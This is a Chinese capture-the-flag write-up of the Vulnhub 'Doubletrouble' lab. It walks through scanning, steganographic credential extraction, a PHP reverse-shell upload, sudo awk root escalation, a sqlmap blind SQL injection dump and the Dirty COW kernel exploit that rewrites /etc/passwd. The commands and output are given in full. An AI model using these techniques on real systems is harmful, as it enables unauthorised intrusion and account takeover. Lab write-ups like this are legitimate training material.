[Vulnhub]Doubletrouble题解WP

信息收集

服务探测

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.103

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 23:34 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
MAC Address: 08:00:27:AA:7B:CB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.79 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds

发现开了个HTTP服务，尝试利用弱密码登录下，好吧，用户名还必须要邮箱后缀的，那大概率猜不到了

尝试扫一下目录，发现有个secret的目录，里面有张图

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/backups              (Status: 301) [Size: 318] [--> http://192.168.56.103/backups/]
/batch                (Status: 301) [Size: 316] [--> http://192.168.56.103/batch/]
/core                 (Status: 301) [Size: 315] [--> http://192.168.56.103/core/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.103/css/]
/favicon.ico          (Status: 200) [Size: 894]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.103/images/]
/index.php            (Status: 200) [Size: 5814]
/install              (Status: 301) [Size: 318] [--> http://192.168.56.103/install/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.103/js/]
/robots.txt           (Status: 200) [Size: 26]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.103/secret/]
/server-status        (Status: 403) [Size: 279]
/sf                   (Status: 301) [Size: 313] [--> http://192.168.56.103/sf/]
/template             (Status: 301) [Size: 319] [--> http://192.168.56.103/template/]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.103/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

把图片wget一下，盲猜图片隐写

尝试利用stegseek分析图片，果然有东西，

┌──(kali㉿kali)-[~]
└─$ stegseek doubletrouble.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

cat一下分离出来的文件

┌──(kali㉿kali)-[~]
└─$ cat doubletrouble.jpg.out
[email protected]
otis666

这样就得到用户账户了

登入到后台查找可以利用的点，发现有个图片上传，这个图片上传并不校验文件扩展名或 MIME 类型，所以直接传个Php Reverse Shell即可，你可以通过这个网址生成一下Online - Reverse Shell Generator

那传上去的文件在哪呢？还记得上面扫过的目录有个uploads的目录就藏在里面

这样就获取到了WebShell

┌──(kali㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
192.168.56.103: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.103] 43072
SOCKET: Shell has connected! PID: 1179
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash 2>/dev/null
www-data@doubletrouble:/var/www/html/uploads/users$

用户提权

查看sudo权限，发现可以利用awk提权至Root

www-data@doubletrouble:/var/www$ sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
www-data@doubletrouble:/var/www$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
uid=0(root) gid=0(root) groups=0(root)
# cd root
/bin/sh: 2: cd: can't cd to root
# cd /root
# ls
doubletrouble.ova
    

发现Root目录下藏得不是flag而是另一个虚拟机文件，这就很有意思了，套娃了，做了一个靶机相当于做了两个🤣

看看靶机上有没有python，尝试利用python开个简易的http服务，我用powershellwget到本地，再导入一台靶机

# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.1 - - [24/Nov/2024 23:10:09] "GET /doubletrouble.ova HTTP/1.1" 200 -
-----------------------------------------------------------------
 ⚡maple ❯❯ wget -Uri "http://192.168.56.103:8000/doubletrouble.ova" -OutFile "C:\Users\maple\Desktop\doubletrouble.ova"

靶机名字叫inner，难怪我说怎么提权怎么容易，再次对新靶机扫一下

信息收集

服务探测

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:a8:d0:48       (Unknown)
192.168.56.104  08:00:27:2a:55:9e       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.865 seconds (137.27 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.104

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 02:03 EST
Nmap scan report for www.mywaf.nyx (192.168.56.104)
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:2A:55:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.15 ms www.mywaf.nyx (192.168.56.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds

发现也是开了个http服务，看了一下发现是个很简陋的登入界面

尝试使用弱密码登入无效，猜测存在sql注入漏洞，手工注入就太麻烦了，直接上SqlMap不过这里我不知道为什么不加sudo会显示 unable to connect to the target URL，正常来说我普通用户也可以连接到靶机，我都可以正常curl网页

加了sudo以root用户运行就可以了，不懂

┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u "http://192.168.56.104/index.php" --forms --batch -D doubletrouble -T users --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:30:24 /2024-11-25/

[02:30:24] [INFO] testing connection to the target URL
[02:30:24] [INFO] searching for forms
[1/1] Form:
POST http://192.168.56.104/index.php
POST data: uname=&psw=&btnLogin=Login
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=&btnLogin=Login] (Warning: blank fields detected): uname=&psw=&btnLogin=Login
do you want to fill blank fields with random values? [Y/n] Y
[02:30:24] [INFO] resuming back-end DBMS 'mysql'
[02:30:24] [INFO] using '/root/.local/share/sqlmap/output/results-11252024_0230am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=ReGx' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))KDYF) AND 'KygY'='KygY&psw=KCvn&btnLogin=Login
---
do you want to exploit this SQL injection? [Y/n] Y
[02:30:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.5.38, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[02:30:24] [INFO] fetching columns for table 'users' in database 'doubletrouble'
[02:30:24] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[02:30:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[02:30:34] [INFO] retrieved:
[02:30:40] [INFO] adjusting time delay to 1 second due to good response times
username
[02:31:01] [INFO] retrieved: password
[02:31:28] [INFO] fetching entries for table 'users' in database 'doubletrouble'
[02:31:28] [INFO] fetching number of entries for table 'users' in database 'doubletrouble'
[02:31:28] [INFO] retrieved: 2
[02:31:30] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
GfsZxc1
[02:31:56] [INFO] retrieved: montreux
[02:32:25] [INFO] retrieved: ZubZub99
[02:32:57] [INFO] retrieved: clapton
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1  | montreux |
| ZubZub99 | clapton  |
+----------+----------+

[02:33:22] [INFO] table 'doubletrouble.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.104/dump/doubletrouble/users.csv'
[02:33:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11252024_0230am.csv'

[*] ending @ 02:33:22 /2024-11-25/

这里拿到两个账户，我分别尝试登入网页发现无任何反应

之前还扫到开了ssh端口

尝试ssh连接一下，说不定有收获，巧了尝试第二个就连上了，哈哈

┌──(kali㉿kali)-[~]
└─$ ssh clapton@$ip
[email protected]'s password:
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
clapton@doubletrouble:~$ cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble:~$

这样就拿到user的flag了

Root提权

如何提到root用户呢，查看当前用户有无特殊文件的SUID权限

clapton@doubletrouble:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/exim4
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/bin/ping
/bin/mount
/bin/umount
/bin/su
/bin/ping6

好像是没有，那只能上LinPeas扫一下

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

有个建议cve可以利用脏牛漏洞，之前连上ssh的时候提示Ubuntu版本为3.2.78-1，或者你可以使用uname -a查看版本

正好符合脏牛的特征

同时发现靶机上有gcc编译的程序

═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/wget

raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c将这个c源代码传到靶机上，进行编译

clapton@doubletrouble:/tmp$ wget 192.168.56.102/dirty.c
--2024-11-25 02:27:04--  http://192.168.56.102/dirty.c
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4815 (4.7K) [application/octet-stream]
Saving to: `dirty.c'

100%[============================================================================================================>] 4,815       --.-K/s   in 0s

2024-11-25 02:27:04 (736 MB/s) - `dirty.c' saved [4815/4815]

clapton@doubletrouble:/tmp$ ls
dirty.c  linpeas.sh
clapton@doubletrouble:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:/tmp$ ls
dirty  dirty.c  linpeas.sh
clapton@doubletrouble:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash

mmap: 7f29f0cf9000
id
^C
clapton@doubletrouble:/tmp$ cat /etc/passwd
firefart:fikF6I.XwWM36:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

• gcc：GNU编译器集合，用于编译C语言源文件。
• -pthread：启用POSIX线程库，用于支持多线程编程。
• dirty.c：要编译的C语言源文件。
• -o dirty：指定输出的可执行文件名为dirty。
• -lcrypt：链接crypt库，该库提供了密码学函数。

脏牛会将root账户变成一个firefart用户然后密码变为自己定义的pass，你在运行脏牛的时候提示输入密码，这个密码就是firefart的密码，权限与root等同

clapton@doubletrouble:/tmp$ su -l firefart
Password:
firefart@doubletrouble:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@doubletrouble:~# cat root.txt
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble:~#

这样就拿到了root的flag，还是比较简单的靶机😊